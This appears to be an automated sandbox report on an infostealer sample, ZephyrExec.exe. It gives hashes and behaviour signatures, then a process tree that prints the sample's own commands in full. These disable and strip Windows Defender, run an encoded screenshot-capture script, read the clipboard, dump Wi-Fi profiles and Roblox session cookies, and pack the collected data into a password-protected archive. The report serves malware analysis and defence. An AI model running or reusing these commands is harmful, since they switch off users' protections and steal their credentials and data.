Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-02-2025 23:33

General

  • Target

    ZephyrExec.exe

  • Size

    7.6MB

  • MD5

    ab54a57c9a91ef8ad6049cd8b390fdf8

  • SHA1

    7923378ad3acada45164b06eff8fc8901791ce74

  • SHA256

    3ab06c1340d3b7ef5d124485b62db7a8b1e684f21f2c5456ac5289f9f25ffd7b

  • SHA512

    10acb23466d99574b4abc1797170f38fe3c872f5ce604a67413329db400c8dddd2901183b7b1736b59baa648261aa6a3a258d4ce878ad513fd606f4caab0393b

  • SSDEEP

    196608:xWv06AQzgwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAoJ:jU/IH20drLYRZjoJ

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZephyrExec.exe
    "C:\Users\Admin\AppData\Local\Temp\ZephyrExec.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Users\Admin\AppData\Local\Temp\ZephyrExec.exe
      "C:\Users\Admin\AppData\Local\Temp\ZephyrExec.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ZephyrExec.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ZephyrExec.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1212
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Project has been abandoned.', 0, 'Noble 3xec', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4756
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Project has been abandoned.', 0, 'Noble 3xec', 48+16);close()"
          4⤵
            PID:2428
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1172
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4544
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1864
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3272
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3024
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5108
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:3900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2952
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3984
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:2476
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:4084
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4700
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:2252
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4212
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              4⤵
                PID:4988
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4488
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4940
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ndie2fco\ndie2fco.cmdline"
                  5⤵
                    PID:1464
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB546.tmp" "c:\Users\Admin\AppData\Local\Temp\ndie2fco\CSCBBBFB57384BE4141A52B97FAB95A7E14.TMP"
                      6⤵
                        PID:3384
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4608
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2232
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3688
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:772
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        3⤵
                          PID:3652
                          • C:\Windows\system32\attrib.exe
                            attrib -r C:\Windows\System32\drivers\etc\hosts
                            4⤵
                            • Drops file in Drivers directory
                            • Views/modifies file attributes
                            PID:4260
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4036
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:552
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                              3⤵
                                PID:4500
                                • C:\Windows\system32\attrib.exe
                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:3376
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:4304
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:2356
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    3⤵
                                      PID:4972
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:4700
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /FO LIST
                                          4⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2640
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:464
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4292
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:400
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4036
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              3⤵
                                                PID:3680
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4292
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                3⤵
                                                  PID:4448
                                                  • C:\Windows\system32\getmac.exe
                                                    getmac
                                                    4⤵
                                                      PID:3840
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\JFDpb.zip" *"
                                                    3⤵
                                                      PID:1752
                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI8882\rar.exe
                                                        C:\Users\Admin\AppData\Local\Temp\_MEI8882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\JFDpb.zip" *
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:1732
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      3⤵
                                                        PID:4832
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic os get Caption
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1492
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                        3⤵
                                                          PID:1860
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic computersystem get totalphysicalmemory
                                                            4⤵
                                                              PID:5040
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            3⤵
                                                              PID:5076
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                4⤵
                                                                  PID:1504
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                3⤵
                                                                  PID:1844
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4056
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                  3⤵
                                                                    PID:2232
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic path win32_VideoController get name
                                                                      4⤵
                                                                      • Detects videocard installed
                                                                      PID:4088
                                                                  • C:\Windows\system32\cmd.exe
